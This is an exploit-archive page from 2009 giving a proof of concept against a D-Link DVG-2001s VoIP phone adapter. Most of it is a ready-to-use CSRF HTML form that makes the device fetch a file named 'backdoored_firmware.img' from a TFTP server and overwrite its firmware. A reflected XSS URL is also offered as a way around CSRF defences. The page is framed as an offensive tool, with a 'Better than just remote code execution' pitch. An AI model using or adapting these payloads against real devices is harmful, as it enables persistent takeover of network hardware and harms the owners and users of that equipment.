D-Link VoIP Phone Adapter XSS/XSRF Remote Firmware Overwrite

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : D-Link VoIP Phone Adapter XSS/XSRF Remote Firmware Overwrite
# Published : 2009-01-29
# Author : Michael Brooks
# Previous Title : Profense Web Application Firewall 2.6.2 XSRF/XSS Vulnerabilities
# Next Title : Zoom VoIP Phone Adapater ATA1+1 1.2.5 XSRF Exploit

D-link VoIP Phone Adapter XSS and XSRF(remote firmware overwrite)
model number: DVG-2001s
f/w version 1.00.007

Better than just remote code execution,  you control the firmware.

<html>
	<form action="http://10.1.1.166/Forms/cbi_Set_SW_Update?16640,0,0,0,0,0,0,0,0"
method="POST">
		<input name="page_HiddenVar" value="0">
		<input name="TFTPServerAddress1" value="10">
		<input name="TFTPServerAddress2" value="1">
		<input name="TFTPServerAddress3" value="1">
		<input name="TFTPServerAddress4" value="1">
		<input name="FirmwareUpdate" value="enabled">
		<input name="FileName" value="backdoored_firmware.img">
		<input type=submit value="attack">
	</form>
</html>
and xss which can be used for csrf bypass:
http://10.1.1.166/Forms/page_CfgDevInfo_Set?%3Cscript%3Ealert(%22hacked%22)%3C/script%3E

# www.Syue.com [2009-01-29]